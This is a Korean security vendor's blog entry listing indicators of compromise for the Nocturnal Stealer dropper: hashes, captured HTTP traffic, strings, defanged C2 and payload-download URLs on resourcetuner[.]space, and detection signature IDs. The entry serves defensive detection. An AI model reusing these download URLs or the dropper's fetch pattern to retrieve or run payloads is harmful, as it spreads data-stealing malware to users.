Wins blog

글로벌 정보보안 파트너! Global Security No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보[Malware Info] Win32/Spyware.Nocturnal (Dropper)
작성일 2018-06-05 조회 733

 

 

ㅁ Malware IoC

 

  Pattern    Win32/Spyware.Nocturnal (Dropper)
  Filename    -
  Type    exe
  Size    6,634,136 bytes
  MD5    9d5184d60ec2fc6444d00de8927d5e37

 

 

 

ㅁ Malware Traffic

 

GET /loder/go.html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Host: resourcetuner[.]space

GET /loder/1.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Host: resourcetuner[.]space

 

HTTP/1.1 200 OK

Server: nginx

Date: Tue, 05 Jun 2018 02:39:22 GMT

Content-Type: application/x-msdownload

Content-Length: 2186392

Connection: keep-alive

Last-Modified: Tue, 29 May 2018 16:35:47 GMT

Expires: Sat, 04 Aug 2018 02:39:22 GMT

Cache-Control: max-age=5184000

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Nginx-Cache-Status: BYPASS

X-Server-Powered-By: Engintron

Pragma: public

Accept-Ranges: bytes

 

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.

GET /loder/2.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Host: resourcetuner[.]space

 

HTTP/1.1 200 OK

Server: nginx

Date: Tue, 05 Jun 2018 02:39:35 GMT

Content-Type: application/x-msdownload

Content-Length: 1891280

Connection: keep-alive

Last-Modified: Tue, 29 May 2018 16:35:47 GMT

Expires: Sat, 04 Aug 2018 02:39:35 GMT

Cache-Control: max-age=5184000

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Nginx-Cache-Status: BYPASS

X-Server-Powered-By: Engintron

Pragma: public

Accept-Ranges: bytes

 

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.

GET /loder/3.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Host: resourcetuner[.]space

 

HTTP/1.1 404 Not Found

Server: nginx

Date: Tue, 05 Jun 2018 02:39:45 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 328

Connection: keep-alive

Vary: Accept-Encoding

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

 

 

 

ㅁ Malware String

 

 -  ASCII : hxxp://resourcetuner[.]space/loder/go.html
 -  ASCII : hxxp://resourcetuner[.]space/loder/1.exe
 -  ASCII : hxxp://resourcetuner[.]space/loder/2.exe
 -  ASCII : hxxp://resourcetuner[.]space/loder/3.exe

 -  ASCII : C:Program Files (x86)/Resource Tuner/ResTuner

 -  ASCII : %userappdata%/RestartApp.exe
 -  ASCII : C:Program Files (x86)/Resource Tuner/ResTuner/Updater.exe

 

 

 

ㅁ Malware C2

 

 - hxxp://resourcetuner[.]space/loder/go.html
 - hxxp://resourcetuner[.]space/loder/1.exe
 - hxxp://resourcetuner[.]space/loder/2.exe
 - hxxp://resourcetuner[.]space/loder/3.exe

 

 

 

ㅁ Malware Hash

 

 - 205def439aeb685d5a9123613e49f59d4cd5ebab9e933a1567a2f2972bda18c3

 

 

 

ㅁ Wins Sniper Pattern

 

 - [4342] Win32/Spyware.Nocturnal.Connection

 - [4343] Win32/Spyware.Nocturnal.2186392

 - [4344] Win32/Spyware.Nocturnal.1891280

 - [4345] Win32/Spyware.Nocturnal.2159648

 

 

ㅁ Wins APTX

 

 

 

 

 

 

Source

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap
첨부파일 첨부파일이 없습니다.
태그 Spyware  Nocturnal  Malware Info